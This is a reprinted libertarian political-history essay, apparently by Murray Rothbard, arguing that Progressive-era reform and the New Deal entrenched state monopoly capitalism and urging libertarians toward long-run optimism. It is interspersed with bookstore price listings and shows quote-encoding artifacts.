Thus , with liberalism abandoned from within , there was no longer a party of hope in the Western world , no longer a u201CLeftu201D movement to lead a struggle against the state and against the unbreached remainder of the Old Order .
Into this gap , into this void created by the drying up of radical liberalism , there stepped a new movement : socialism .
Libertarians of the present day are accustomed to think of socialism as the polar opposite of the libertarian creed .
But this is a grave mistake , responsible for a severe ideological disorientation of libertarians in the present world .
As we have seen , conservatism was the polar opposite of liberty ; and socialism , while to the u201 Cleftu201D of conservatism , was essentially a confused , middle - of - the - road movement .
It was , and still is , middle - of - the - road because it tries to achieve liberal ends by the use of conservative means .
Man , Economy , and Stat ... Murray N. Rothbard Best Price : $ 23.43 Buy New $ 29.95 ( as of 08:10 EST - Details )
In short , Russell Kirk , who claims that socialism was the heir of classical liberalism , and Ronald Hamowy , who sees socialism as the heir of conservatism , are both right ; for the question is on what aspect of this confused centrist movement we happen to be focusing .
Socialism , like liberalism and against conservatism , accepted the industrial system and the liberal goals of freedom , reason , mobility , progress , higher living standards for the masses , and an end to theocracy and war ; but it tried to achieve these ends by the use of incompatible , conservative means : statism , central planning , communitarianism , etc .
Or rather , to be more precise , there were from the beginning two different strands within socialism : one was the right - wing , authoritarian strand , from Saint - Simon down , which glorified statism , hierarchy , and collectivism and which was thus a projection of conservatism trying to accept and dominate the new industrial civilization .
The other was the left - wing , relatively libertarian strand , exemplified in their different ways by Marx and Bakunin , revolutionary and far more interested in achieving the libertarian goals of liberalism and socialism ; but especially the smashing of the state apparatus to achieve the u201 Cwithering away of the Stateu201D and the u201 Cend of the exploitation of man by man.u201D
Interestingly enough , the very Marxian phrase , the u201 Creplacement of the government by men by the administration of things , u201D can be traced , by a circuitous route , from the great French radical laissez - faire liberals of the early nineteenth century , Charles Comte ( no relation to Auguste Comte ) and Charles Dunoyer .
And so , too , may the concept of the u201 Cclass struggleu201D ; except that for Dunoyer and Comte the inherently antithetical classes were not businessmen versus workers , but the producers in society ( including free businessmen , workers , peasants , etc. ) versus the exploiting classes constituting , and privileged by , the State apparatus . [ 4 ]
Saint - Simon at one time in his confused and chaotic life was close to Comte and Dunoyer and picked up his class analysis from them , in the process characteristically getting the whole thing balled up and converting businessmen on the market , as well as feudal landlords and others of the State privileged , into u201 Cexploiters .
u201D Marx and Bakunin picked this up from the Saint - Simonians , and the result gravely misled the whole left - socialist movement ; for , then , in addition to smashing the repressive State , it became supposedly necessary to smash private capitalist ownership of the means of production .
Rejecting private property , especially of capital , the left socialists were then trapped in a crucial inner contradiction : if the State is to disappear after the revolution ( immediately for Bakunin , gradually u201 Cwitheringu201D for Marx ) , then how is the u201 Ccollectiveu201D to run its property without becoming an enormous State itself in fact , even if not in name ?
This was a contradiction which neither the Marxists nor the Bakuninists were ever able to resolve .
Having replaced radical liberalism as the party of the u201 Cleft , u201D socialism , by the turn of the twentieth century , fell prey to this inner contradiction .
Most socialists ( Fabians , Lassalleans , even Marxists ) turned sharply rightward , completely abandoned the old libertarian goals and ideals of revolution and the withering away of the State and became cozy conservatives permanently reconciled to the State , the status quo , and the whole apparatus of neomercantilism , State monopoly capitalism , imperialism , and war that was rapidly being established and riveted on European society at the turn of the twentieth century .
For conservatism , too , had re-formed and regrouped to try to cope with a modern industrial system and had become a refurbished mercantilism , a regime of statism , marked by State monopoly privilege , in direct and indirect forms , to favored capitalists and to quasi- feudal landlords .
The affinity between right socialism and the new conservatism became very close , the former advocating similar policies but with a demagogic populist veneer .
Thus , the other side of the coin of imperialism was u201 Csocial imperialism , u201D which Joseph Schumpeter trenchantly defined as u201 Can imperialism in which the entrepreneurs and other elements woo the workers by means of social welfare concessions which appear to depend on the success of export monopolism .u201D [ 5 ]
The Betrayal of the Am ... Murray N. Rothbard , Mu ... Best Price : $ 11.20 Buy New $ 18.50 ( as of 07:55 EST - Details )
Historians have long recognized the affinity , and the welding together , of right - wing socialism with conservatism in Italy and Germany , where the fusion was embodied first in Bismarckism and then in fascism and national socialism  the latter fulfilling the Conservative program of nationalism , imperialism , militarism , theocracy , and a right - wing collectivism that retained and even cemented the rule of the old privileged classes .
But only recently have historians begun to realize that a similar pattern occurred in England and the United States .
Thus , Bernard Semmel , in his brilliant history of the social - imperialist movement in England at the turn of the twentieth century , shows how the Fabian Society welcomed the rise of the imperialists in England . [ 6 ]
When , in the mid-1890s , the Liberal Party in England split into the radicals on the left and the liberal - imperialists on the right , Beatrice Webb , co-leader of the Fabians , denounced the radicals as u201 Claissez - faire and anti-imperialists , u201D while hailing the latter as u201 Ccollectivists and imperialists .
u201D
An official Fabian manifesto , Fabianism and the Empire ( 1900 ) , drawn up by George Bernard Shaw ( who was later , with perfect consistency , to praise the domestic policies of Stalin and Mussolini and Sir Oswald Mosley ) , lauded imperialism and attacked the radicals , who u201Cstill cling to the fixed - frontier ideals of individualist republicanism ( and ) noninterference.u201D
In contrast , u201Ca Great Power . . . must govern ( a world empire ) in the interests of civilization as a whole .
u201D
After this , the Fabians collaborated closely with Tories and liberal - imperialists .
Indeed , in late 1902 , Sidney and Beatrice Webb established a small , secret group of brain - trusters , called The Coefficients ; as one of the leading members of this club , the Tory imperialist , Leopold S. Amery , revealingly wrote :
Sidney and Beatrice Webb were much more concerned with getting their ideas of the welfare state put into practice by anyone who might be prepared to help , even on the most modest scale , than with the early triumph of an avowedly Socialist Party .
. . .
There was , after all , nothing so very unnatural , as [ Joseph ] Chamberlain's own career had shown , in a combination of Imperialism in external affairs with municipal socialism or semi-socialism at home . [ 7 ]
Other members of The Coefficients , who , as Amery wrote , were to function as u201CBrain Trusts or General Staffu201D for the movement , were : the liberal - imperialist Richard B. Haldane ; the geopolitician Halford J. Mackinder ; the Imperialist and Germanophobe Leopold Maxse , publisher of the National Review ; the Tory socialist and imperialist Viscount Milner ; the naval imperialist Carlyon Bellairs ; the famous journalist J. L. Garvin ; Bernard Shaw ; Sir Clinton Dawkins , partner of the Morgan Bank ; and Sir Edward Grey , who , at a meeting of the club first adumbrated the policy of Entente with France and Russia that was to eventuate in World War I . [ 8 ]
The famous betrayal during World War I of the old ideals of revolutionary pacifism by the European Socialists , and even by the Marxists , should have come as no surprise ; that each Socialist Party supported its u201 Cownu201D national government in the war ( with the honorable exception of Eugene Victor Debs 's Socialist Party in the United States ) was the final embodiment of the collapse of the classic Socialist Left .
From then on , Socialists and quasi-Socialists joined Conservatives in a basic amalgam , accepting the state and the mixed economy ( = neo-mercantilism = the welfare state = interventionism = state monopoly capitalism , merely synonyms for the same essential reality ) .
It was in reaction to this collapse that Lenin broke out of the Second International to reestablish classic revolutionary Marxism in a revival of left socialism .
Wall Street , Banks , an ...
Murray N Rothbard Best Price : $ 5.39 Buy New $ 4.00 ( as of 05:45 EST - Details )
In fact , Lenin , almost without knowing it , accomplished more than this .
It is common knowledge that u201 Cpurifying u201D movements , eager to return to a classic purity shorn of recent corruptions , generally purify further than what had held true among the original classic sources .
There were , indeed , marked u201 Cconservativeu201D strains in the writings of Marx and Engels themselves which often justified the State , Western imperialism , and aggressive nationalism , and it was these motifs , in the ambivalent views of the masters on this subject , that provided the fodder for the later shift of the majority Marxists into the u201 Csocial imperialistu201D camp . [ 9 ]
Lenin 's camp turned more u201 Cleftu201D than had Marx and Engels themselves .
Lenin had a decidedly more revolutionary stance toward the State and consistently defended and supported movements of national liberation against imperialism .
The Leninist shift was more u201 Cleftistu201D in other important senses as well .
For while Marx had centered his attack on market capitalism per se , the major focus of Lenin 's concerns was on what he conceived to be the highest stages of capitalism : imperialism and monopoly .
Hence Lenin 's focus , centering as it did in practice on State monopoly and imperialism rather than on laissez - faire capitalism , was in that way far more congenial to the Libertarian than that of Karl Marx .
Fascism and Nazism were the local culmination in domestic affairs of the modern drift toward right - wing collectivism .
It has become customary among libertarians , as indeed among the Establishment of the West , to regard fascism and communism as fundamentally identical .
But while both systems were indubitably collectivist , they differed greatly in their socioeconomic content .
Communism was a genuine revolutionary movement that ruthlessly displaced and overthrew the old ruling elites , while fascism , on the contrary , cemented into power the old ruling classes .
Hence , fascism was a counterrevolutionary movement that froze a set of monopoly privileges upon society ; in short , fascism was the apotheosis of modern State monopoly capitalism . [ 10 ]
Here was the reason that fascism proved so attractive ( which communism , of course , never did ) to big business interests in the West  openly and unabashedly so in the 1920s and early 1930s . [ 11 ]
We are now in a position to apply our analysis to the American scene .
Here we encounter a contrasting myth about recent American history which has been propagated by current conservatives and adopted by most American libertarians .
The myth goes approximately as follows : America was , more or less , a haven of laissez - faire until the New Deal ; then Roosevelt , influenced by Felix Frankfurter , the Intercollegiate Socialist Society , and other u201CFabianu201D and communist u201 Cconspirators , u201D engineered a revolution which set America on the path to socialism , and further on beyond the horizon , to communism .
The present - day libertarian who adopts this or a similar view of the American experience , tends to think of himself as an u201 Cextreme right - winger u201D ; slightly to the left of him , then , stands the conservative , to the left of that the middle - of - the - road , and then leftward to socialism and communism .
Hence , the enormous temptation for some libertarians to red-bait ; for , since they see America as drifting inexorably leftward to socialism and , therefore , to communism , the great temptation is for them to overlook the intermediary stages and tar all of their opposition with the hated Red brush .
One would think that the u201 Cright - wing Libertarianu201D would quickly be able to see some drastic flaws in this conception .
For one thing , the income tax amendment , which he deplores as the beginning of socialism in America , was put through Congress in 1909 by an overwhelming majority of both parties .
To look at this event as a sharp leftward move toward socialism would require treating President William Howard Taft , who put through the Sixteenth Amendment , as a Leftist , and surely few would have the temerity to do that .
Indeed , the New Deal was not a revolution in any sense ; its entire collectivist program was anticipated : proximately by Herbert Hoover during the depression , and , beyond that , by the war - collectivism and central planning that governed America during World War I .
Every element in the New Deal program : central planning , creation of a network of compulsory cartels for industry and agriculture , inflation and credit expansion , artificial raising of wage rates and promotion of unions within the overall monopoly structure , government regulation and ownership , all this had been anticipated and adumbrated during the previous two decades . [ 12 ]
And this program , with its privileging of various big business interests at the top of the collectivist heap , was in no sense reminiscent of socialism or leftism ; there was nothing smacking of the egalitarian or the proletarian here .
No , the kinship of this burgeoning collectivism was not at all with socialism - communism but with fascism , or socialism - of - the - right , a kinship which many big businessmen of the twenties expressed openly in their yearning for abandonment of a quasi - laissez - faire system for a collectivism which they could control .
And , surely , William Howard Taft , Woodrow Wilson , and Herbert Clark Hoover make far more recognizable figures as proto -Fascists than they do as crypto-communists .
Conceived in Liberty V... Murray N. Rothbard Best Price : $ 35.13 Buy New $ 29.95 ( as of 08:10 EST - Details )
The essence of the New Deal was seen , far more clearly than in the Conservative mythology , by the Leninist movement in the early 1930s ; that is , until the mid-thirties , when the exigencies of Soviet foreign relations caused a sharp shift of the world communist line to u201CPopular Frontu201D approval of the New Deal .
Thus , in 1934 , the British Leninist theoretician R. Palme Dutt published a brief but scathing analysis of the New Deal as u201 Csocial fascismu201D  as the reality of fascism cloaked with a thin veneer of populist demagogy .
No Conservative opponent has ever delivered a more vigorous or trenchant denunciation of the New Deal .
The Roosevelt policy , wrote Dutt , was to u201 Cmove to a form of dictatorship of a war - typeu201D ; the essential policies were to impose a State monopoly capitalism through the NRA , to subsidize business , banking , and agriculture through inflation and the partial expropriation of the mass of the people through lower real - wage rates and to the regulation and exploitation of labor by means of government - fixed wages and compulsory arbitration .
When the New Deal , wrote Dutt , is stripped of its u201Csocial - reformist u2018 progressive ' camouflage , u201D u201 Cthe reality of the new Fascist type of system of concentrated State capitalism and industrial servitude remains , u201D including an implicit u201 Cadvance to war .
u201D
Dutt effectively concluded with a quote from an editor of the highly respected Current History Magazine :
The new America [ the editor had written in mid-1933 ] will not be capitalist in the old sense , nor will it be socialist .
If at the moment the trend is towards fascism , it will be an American fascism , embodying the experience , the traditions , and the hopes of a great middle - class nation . [ 13 ]
Thus , the New Deal was not a qualitative break from the American past ; on the contrary , it was merely a quantitative extension of the web of State privilege that had been proposed and acted upon before : in Hoover 's administration , in the war collectivism of World War I , and in the Progressive Era .
The most thorough exposition of the origins of State monopoly capitalism , or what he calls u201 Cpolitical capitalism , u201D in the United States is found in the brilliant work of Dr. Gabriel Kolko .
In The Triumph of Conservatism , Kolko traces the origins of political capitalism in the u201 Creformsu201D of the Progressive Era .
Orthodox historians have always treated the Progressive period ( roughly 1900 – 1916 ) as a time when free - market capitalism was becoming increasingly u201 Cmonopolisticu201D ; in reaction to this reign of monopoly and big business , so the story runs , altruistic intellectuals and far - seeing politicians turned to intervention by the government to reform and to regulate these evils .
Kolko's great work demonstrates that the reality was almost precisely the opposite of this myth .
Despite the wave of mergers and trusts formed around the turn of the century , Kolko reveals , the forces of competition on the free market rapidly vitiated and dissolved these attempts at stabilizing and perpetuating the economic power of big business interests .
It was precisely in reaction to their impending defeat at the hands of the competitive storms of the market that big business turned , increasingly after the 1900s , to the federal government for aid and protection .
In short , the intervention by the federal government was designed , not to curb big business monopoly for the sake of the public weal , but to create monopolies that big business ( as well as trade associations of smaller business ) had not been able to establish amidst the competitive gales of the free market .
Both left and right have been persistently misled by the notion that intervention by the government is ipso facto leftish and antibusiness .
Hence the mythology of the New - Fair Deal - as - Red that is endemic on the right .
Both the big businessmen , led by the Morgan interests , and Professor Kolko , almost uniquely in the academic world , have realized that monopoly privilege can only be created by the State and not as a result of free - market operations .
Thus , Kolko shows that , beginning with Theodore Roosevelt 's New Nationalism and culminating in Wilson 's New Freedom , in industry after industry , for example , insurance , banking , meat , exports and business generally , regulations that present - day rightists think of as u201 Csocialisticu201D were not only uniformly hailed , but conceived and brought about by big businessmen .
This was a conscious effort to fasten upon the economy a cement of subsidy , stabilization , and monopoly privilege .
A typical view was that of Andrew Carnegie ; deeply concerned about competition in the steel industry , which neither the formation of U.S. Steel nor the famous u201CGary Dinnersu201D sponsored by that Morgan company could dampen , Carnegie declared in 1908 that u201 Cit always comes back to me that government control , and that alone , will properly solve the problem .
u201D
There is nothing alarming about government regulation per se , announced Carnegie , u201 Ccapital is perfectly safe in the gas company , although it is under court control .
So will all capital be , although under government control.u201D [ 14 ]
The Triumph of Conserv ... Gabriel Kolko Best Price : $ 2.64 Buy New $ 11.46 ( as of 08:40 EST - Details )
The Progressive Party , Kolko shows , was basically a Morgan - created party to reelect Roosevelt and punish President Taft , who had been overzealous in prosecuting Morgan enterprises ; the leftish social workers often unwittingly provided a demagogic veneer for a conservative - statist movement .
Wilson 's New Freedom , culminating in the creation of the Federal Trade Commission , far from being considered dangerously socialistic by big business , was welcomed enthusiastically as putting their long - cherished program of support , privilege , and regulation of competition into effect ( and Wilson 's war collectivism was welcomed even more exuberantly ) .
Edward N. Hurley , chairman of the Federal Trade Commission and formerly president of the Illinois Manufacturers Association , happily announced in late 1915 , that the Federal Trade Commission was designed u201 Cto do for general businessu201D what the ICC had been eagerly doing for the railroads and shippers , what the Federal Reserve was doing for the nation 's bankers , and what the Department of Agriculture was accomplishing for the farmers . [ 15 ]
As would happen more dramatically in European fascism , each economic interest group was being cartelized and monopolized and fitted into its privileged niche in a hierarchically - ordered socioeconomic structure .
Particularly influential were the views of Arthur Jerome Eddy , an eminent corporation lawyer who specialized in forming trade associations and who helped to father the Federal Trade Commission .
In his magnum opus fiercely denouncing competition in business and calling for governmentally - controlled and protected industrial u201 Ccooperation , u201D Eddy trumpeted that u201CCompetition is War , and u2018 War is Hell'.u201D [ 16 ]
What of the intellectuals of the Progressive period , damned by the present - day Right as u201Csocialisticu201D ?
Socialistic in a sense they were , but what kind of u201Csocialismu201D ?
The conservative state socialism of Bismarck 's Germany , the prototype for so much of modern European  and American  political forms , and under which the bulk of American intellectuals of the late nineteenth century received their higher education .
As Kolko puts it :
The conservatism of the contemporary intellectuals . . . the idealization of the state by Lester Ward , Richard T. Ely , or Simon N. Patten . . . was also the result of the peculiar training of many of the American academics of this period .
At the end of the nineteenth century the primary influence in American academic social and economic theory was exerted by the universities .
The Bismarckian idealization of the state , with its centralized welfare functions . . . was suitably revised by the thousands of key academics who studied in German universities in the 1880s and 1890s . [ 17 ]
The ideal of the leading ultraconservative German professors , moreover , who were also called u201 Csocialists of the chair , u201D was consciously to form themselves into the u201 Cintellectual bodyguard of the House of Hohenzollernu201D  and that they surely were .
As an exemplar of the Progressive intellectual , Kolko aptly cites Herbert Croly , editor of the Morgan - financed New Republic .
Systematizing Theodore Roosevelt 's New Nationalism , Croly hailed this new Hamiltonianism as a system for collectivist federal control and integration of society into a hierarchical structure .
Looking forward from the Progressive Era , Gabriel Kolko concludes that :
a synthesis of business and politics on the federal level was created during the war , in various administrative and emergency agencies , that continued throughout the following decade .
Indeed , the war period represents the triumph of business in the most emphatic manner possible . . . big business gained total support from the various regulatory agencies and the Executive .
It was during the war that effective , working oligopoly and price and market agreements became operational in the dominant sectors of the American economy .
The rapid diffusion of power in the economy and relatively easy entry virtually ceased .
Despite the cessation of important new legislative enactments , the unity of business and the federal government continued throughout the 1920s and thereafter , using the foundations laid in the Progressive Era to stabilize and consolidate conditions within various industries .
. . .
The principle of utilizing the federal government to stabilize the economy , established in the context of modern industrialism during the Progressive Era , became the basis of political capitalism in its many later ramifications .
In this sense progressivism did not die in the 1920s , but became a part of the basic fabric of American society . [ 18 ]
Economic Controversies ...
Murray N. Rothbard Best Price : $ 13.49 Buy New $ 18.95 ( as of 08:10 EST - Details )
Thus the New Deal .
After a bit of leftish wavering in the middle of the late thirties , the Roosevelt administration recemented its alliance with big business in the national defense and war contract economy that began in 1940 .
This is an economy and a polity that has been ruling America ever since , embodied in the permanent war economy , the full - fledged State monopoly capitalism and neomercantilism , the military - industrial complex of the present era .
The essential features of American society have not changed since it was thoroughly militarized and politicized in World War II  except that the trends intensify , and even in everyday life men have been increasingly molded into conforming organization men serving the State and its military –industrial complex .
William H. Whyte , Jr. , in his justly famous book , The Organization Man , made clear that this molding took place amidst the adoption by business of the collectivist views of u201 Cenlightened u201D sociologists and other social engineers .
It is also clear that this harmony of views is not simply the result of navet by big businessmen  not when such u201 Cnavetu201D coincides with the requirements of compressing the worker and manager into the mold of willing servitor in the great bureaucracy of the military - industrial machine .
And , under the guise of u201 Cdemocracy , u201D education has become mere mass drilling in the techniques of adjustment to the task of becoming a cog in the vast bureaucratic machine .
Meanwhile , the Republicans and Democrats remain as bipartisan in forming and supporting this establishment as they were in the first two decades of the twentieth century .
u201CMe-tooismu201D  bipartisan support of the status quo that underlies the superficial differences between the parties  did not begin in 1940 .
How did the corporal 's guard of remaining libertarians react to these shifts of the ideological spectrum in America ?
An instructive answer may be found by looking at the career of one of the great libertarians of twentieth - century America  Albert Jay Nock .
In the 1920s , when Nock had formulated his radical libertarian philosophy , he was universally regarded as a member of the extreme Left , and he so regarded himself as well .
It is always the tendency , in ideological and political life , to center one 's attention on the main enemy of the day , and the main enemy of that day was the conservative statism of the Coolidge - Hoover administration ; it was natural , therefore , for Nock , his friend and fellow - libertarian H. L. Mencken and other radicals to join quasi-Socialists in battle against the common foe .
When the New Deal succeeded Hoover , on the other hand , the milk - and - water socialists and vaguely leftish Interventionists hopped on the New Deal bandwagon ; on the Left only the Libertarians such as Nock and Mencken and the Leninists ( before the Popular Front period ) realized that Roosevelt was only a continuation of Hoover in other rhetoric .
It was perfectly natural for the radicals to form a united front against Roosevelt with the older Hoover and Al Smith conservatives who either believed Roosevelt had gone too far or disliked his flamboyant populistic rhetoric .
But the problem was that Nock and his fellow radicals , at first properly scornful of their newfound allies , soon began to accept them and even don cheerfully the formerly despised label of u201CConservative .
u201D
With the rank - and - file radicals , this shift took place , as have so many transformations of ideology in history , unwittingly and in default of proper ideological leadership ; for Nock , and to some extent for Mencken , on the other hand , the problem cut far deeper .
The Mystery of Banking Murray N. Rothbard Best Price : $ 2.23 Buy New $ 7.57 ( as of 07:55 EST - Details )
For there had always been one grave flaw in the brilliant and finely - honed libertarian doctrine hammered out in their very different ways by Nock and Mencken ; both had long adopted the great error of pessimism .
Both saw no hope for the human race ever adopting the system of liberty ; despairing of the radical doctrine of liberty ever being applied in practice , each in his own personal way retreated from the responsibility of ideological leadership , Mencken joyously and hedonically , Nock haughtily and secretively .
Despite the massive contribution of both men to the cause of liberty , therefore , neither could ever become the conscious leader of a libertarian movement , for neither could ever envision the party of liberty as the party of hope , the party of revolution , or a fortiori , the party of secular messianism .
The error of pessimism is the first step down the slippery slope that leads to conservatism ; and hence it was all too easy for the pessimistic radical Nock , even though still basically a Libertarian , to accept the conservative label and even come to croak the old platitude that there is an a priori presumption against any social change .
It is fascinating that Albert Jay Nock thus followed the ideological path of his beloved spiritual ancestor Herbert Spencer ; both began as pure radical Libertarians , both quickly abandoned radical or revolutionary tactics as embodied in the will to put their theories into practice through mass action , and both eventually glided from Tory tactics to at least a partial toryism of content .
And so the Libertarians , especially in their sense of where they stood in the ideological spectrum , fused with the older Conservatives who were forced to adopt libertarian phraseology ( but with no real libertarian content ) in opposing a Roosevelt administration that had become too collectivistic for them , either in content or in rhetoric .
World War II reinforced and cemented this alliance ; for , in contrast to all the previous American wars of the century , the pro-peace and u201 Cisolationistu201D forces were all identified , by their enemies and subsequently by themselves , as men of the u201CRight.u201D
By the end of World War II , it was second nature for libertarians to consider themselves at an u201 Cextreme right - wingu201D pole with the Conservatives immediately to the left of them ; and hence the great error of the spectrum that persists to this day .
In particular , the modern libertarians forgot or never realized that opposition to war and militarism had always been a u201 Cleft - wingu201D tradition which had included Libertarians ; and hence when the historical aberration of the New Deal period corrected itself and the u201 Cright - wingu201D was once again the great partisan of total war , the Libertarians were unprepared to understand what was happening and tailed along in the wake of their supposed conservative u201 Callies .
u201D
The liberals had completely lost their old ideological markings and guidelines .
Given a proper reorientation of the ideological spectrum , what then would be the prospects for liberty ?
It is no wonder that the contemporary Libertarian , seeing the world going socialistic and communistic , and believing himself virtually isolated and cut off from any prospect of united mass action , tends to be steeped in long - run pessimism .
But the scene immediately brightens when we realize that that indispensable requisite of modern civilization  the overthrow of the Old Order  was accomplished by mass libertarian action erupting in such great revolutions of the West as the French and American Revolutions , and bringing about the glories of the Industrial Revolution and the advances of liberty , mobility , and rising living standards that we still retain today .
Despite the reactionary swings backward to statism , the modern world stands towering above the world of the past .
When we consider also that , in one form or another , the Old Order of despotism , feudalism , theocracy , and militarism dominated every human civilization until the West of the eighteenth century , optimism over what man has and can achieve must mount still higher .
It might be retorted , however , that this bleak historical record of despotism and stagnation only reinforces pessimism , for it shows the persistence and durability of the Old Order and the seeming frailty and evanescence of the New  especially in view of the retrogression of the past century .
But such superficial analysis neglects the great change that occurred with the revolution of the New Order , a change that is clearly irreversible .
For the Old Order was able to persist in its slave system for centuries precisely because it awoke no expectations and no hopes in the minds of the submerged masses ; their lot was to live and eke out their brutish subsistence in slavery while obeying unquestioningly the commands of their divinely appointed rulers .
But the liberal revolution implanted indelibly in the minds of the masses  not only in the West but in the still feudally - dominated undeveloped world  the burning desire for liberty , for land to the peasantry , for peace between the nations , and , perhaps above all , for the mobility and rising standards of living that can only be brought to them by an industrial civilization .
The masses will never again accept the mindless serfdom of the Old Order ; and given these demands that have been awakened by liberalism and the Industrial Revolution , long - run victory for liberty is inevitable .
For only liberty , only a free market , can organize and maintain an industrial system , and the more that population expands and explodes , the more necessary is the unfettered working of such an industrial economy .
Laissez - faire and the free market become more and more evidently necessary as an industrial system develops ; radical deviations cause breakdowns and economic crises .
This crisis of statism becomes particularly dramatic and acute in a fully socialist society ; and hence the inevitable breakdown of statism has first become strikingly apparent in the countries of the socialist ( that is , communist ) camp .
For socialism confronts its inner contradiction most starkly .
Desperately , it tries to fulfill its proclaimed goals of industrial growth , higher standards of living for the masses , and eventual withering away of the State and is increasingly unable to do so with its collectivist means .
Hence the inevitable breakdown of socialism .
This progressive breakdown of socialist planning was at first partially obscured .
For , in every instance , the Leninists took power not in a developed capitalist country as Marx had wrongly predicted , but in a country suffering from the oppression of feudalism .
Second , the Communists did not attempt to impose socialism upon the economy for many years after taking power ; in Soviet Russia until Stalin 's forced collectivization of the early 1930s reversed the wisdom of Lenin 's New Economic Policy , which Lenin 's favorite theoretician , Bukharin , would have extended onward towards a free market .
Even the supposedly rabid Communist leaders of China did not impose a socialist economy on that country until the late 1950s .
In every case , growing industrialization has imposed a series of economic breakdowns so severe that the communist countries , against their ideological principles , have had to retreat step by step from central planning and return to various degrees and forms of a free market .
The Liberman Plan for the Soviet Union has gained a great deal of publicity ; but the inevitable process of desocialization has proceeded much further in Poland , Hungary , and Czechoslovakia .
Most advanced of all is Yugoslavia , which , freed from Stalinist rigidity earlier than its fellows , in only a dozen years has de-socialized so fast and so far that its economy is now hardly more socialistic than that of France .
The fact that people calling themselves u201 Ccommunistsu201D are still governing the country is irrelevant to the basic social and economic facts .
Central planning in Yugoslavia has virtually disappeared .
The private sector not only predominates in agriculture but is even strong in industry , and the public sector itself has been so radically decentralized and placed under free pricing , profit - and - loss tests and a cooperative worker - ownership of each plant that true socialism hardly exists any longer .
Only the final step of converting workers ' syndical control to individual shares of ownership remains on the path toward outright capitalism .
Communist China and the able Marxist theoreticians of Monthly Review have clearly discerned the situation and have raised the alarm that Yugoslavia is no longer a socialist country .
America ’s Great ... Rothbard , Murray N. Best Price : $ 2.12 Buy New $ 59.88 ( as of 01:10 EST - Details )
One would think that free - market economists would hail the confirmation and increasing relevance of the notable insight of Professor Ludwig von Mises a half - century ago : that socialist states , being necessarily devoid of a genuine price system , could not calculate economically and , therefore , could not plan their economies with any success .
Indeed , one follower of Mises , in effect , predicted this process of desocialization in a novel some years ago .
Yet neither this author nor other free - market economists have given the slightest indication of even recognizing , let alone saluting , this process in the communist countries  perhaps because their almost hysterical view of the alleged threat of communism prevents them from acknowledging any dissolution in the supposed monolith of menace . [ 19 ]
Communist countries , therefore , are increasingly and ineradicably forced to desocialize and will , therefore , eventually reach the free market .
The state of the undeveloped countries is also cause for sustained libertarian optimism .
For all over the world , the peoples of the undeveloped nations are engaged in revolution to throw off their feudal Old Order .
It is true that the United States is doing its mightiest to suppress the very revolutionary process that once brought it and Western Europe out of the shackles of the Old Order ; but it is increasingly clear that even overwhelming armed might cannot suppress the desire of the masses to break through into the modern world .
We are left with the United States and the countries of Western Europe .
Here , the case for optimism is less clear , for the quasi - collectivist system does not present as stark a crisis of self - contradiction as does socialism .
And yet , here , too , economic crisis looms in the future and gnaws away at the complacency of the Keynesian economic managers : creeping inflation , reflected in the aggravating balance - of - payments breakdown of the once almighty dollar ; creeping secular unemployment brought about by minimum wage scales ; and the deeper and long - run accumulation of the uneconomic distortions of the permanent war economy .
Moreover , potential crises in the United States are not merely economic ; there is a burgeoning and inspiring moral ferment among the youth of America against the fetters of centralized bureaucracy , of mass education in uniformity , and of brutality and oppression exercised by the minions of the State .
Furthermore , the maintenance of a substantial degree of free speech and democratic forms facilitates , at least in the short run , the possible growth of a libertarian movement .
The United States is also fortunate in possessing , even if half - forgotten beneath the statist and tyrannical overlay of the last half - century , a great tradition of libertarian thought and action .
The very fact that much of this heritage is still reflected in popular rhetoric , even though stripped of its significance in practice , provides a substantial ideological groundwork for a future party of liberty .
What the Marxists would call the u201 Cobjective conditionsu201D for the triumph of liberty exist , then , everywhere in the world and more so than in any past age ; for everywhere the masses have opted for higher living standards and the promise of freedom and everywhere the various regimes of statism and collectivism cannot fulfill these goals .
What is needed , then , is simply the u201 Csubjective conditionsu201D for victory ; that is , a growing body of informed libertarians who will spread the message to the peoples of the world that liberty and the purely free market provide the way out of their problems and crises .
Liberty cannot be fully achieved unless libertarians exist in number to guide the peoples to the proper path .
But perhaps the greatest stumbling block to the creation of such a movement is the despair and pessimism typical of the Libertarian in today 's world .
Much of that pessimism is due to his misreading of history and his thinking of himself and his handful of confreres as irredeemably isolated from the masses and , therefore , from the winds of history .
Hence he becomes a lone critic of historical events rather than a person who considers himself as part of a potential movement which can and will make history .
The modern Libertarian has forgotten that the Liberal of the seventeenth and eighteenth centuries faced odds much more overwhelming than those which face the Liberal of today ; for in that era before the Industrial Revolution , the victory of liberalism was far from inevitable .
And yet the liberalism of that day was not content to remain a gloomy little sect ; instead , it unified theory and action .
Liberalism grew and developed as an ideology and , leading and guiding the masses , made the revolution which changed the fate of the world .
By its monumental breakthrough , this revolution of the eighteenth century transformed history from a chronicle of stagnation and despotism to an ongoing movement advancing toward a veritable secular utopia of liberty and rationality and abundance .
The Old Order is dead or moribund ; and the reactionary attempts to run a modern society and economy by various throwbacks to the Old Order are doomed to total failure .
The Liberals of the past have left to modern Libertarians a glorious heritage , not only of ideology but of victories against far more devastating odds .
The Liberals of the past have also left a heritage of the proper strategy and tactics for libertarians to follow , not only by leading rather than remaining aloof from the masses , but also by not falling prey to short - run optimism .
For short - run optimism , being unrealistic , leads straightway to disillusion and then to long - run pessimism ; just as , on the other side of the coin , long - run pessimism leads to exclusive and self - defeating concentration on immediate and short - run issues .
Short - run optimism stems , for one thing , from a nave and simplistic view of strategy : that liberty will win merely by educating more intellectuals , who in turn will educate opinion - molders , who in turn will convince the masses , after which the State will somehow fold its tent and silently steal away .
Matters are not that easy .
For libertarians face not only a problem of education but also a problem of power , and it is a law of history that a ruling caste has never voluntarily given up its power .
The Panic Of 1819 : Rea ... Rothbard , Murray N. Best Price : null Buy New $ 32.95 ( as of 01:10 EST - Details )
But the problem of power is , certainly in the United States , far in the future .
For the Libertarian , the main task of the present epoch is to cast off his needless and debilitating pessimism , to set his sights on long - run victory and to set out on the road to its attainment .
To do this , he must , perhaps first of all , drastically realign his mistaken view of the ideological spectrum ; he must discover who his friends and natural allies are , and above all perhaps , who his enemies are .
Armed with this knowledge , let him proceed in the spirit of radical long - run optimism that one of the great figures in the history of libertarian thought , Randolph Bourne , correctly identified as the spirit of youth .
Let Bourne 's stirring words serve also as the guidepost for the spirit of liberty :
[ Y] outh is the incarnation of reason pitted against the rigidity of tradition ; youth puts the remorseless questions to everything that is old and established 
Why ?
What is this thing good for ?
And when it gets the mumbled , evasive answers of the defenders it applies its own fresh , clean spirit of reason to institutions , customs and ideas and finding them stupid , inane or poisonous , turns instinctively to overthrow them and build in their place the things with which its visions teem .
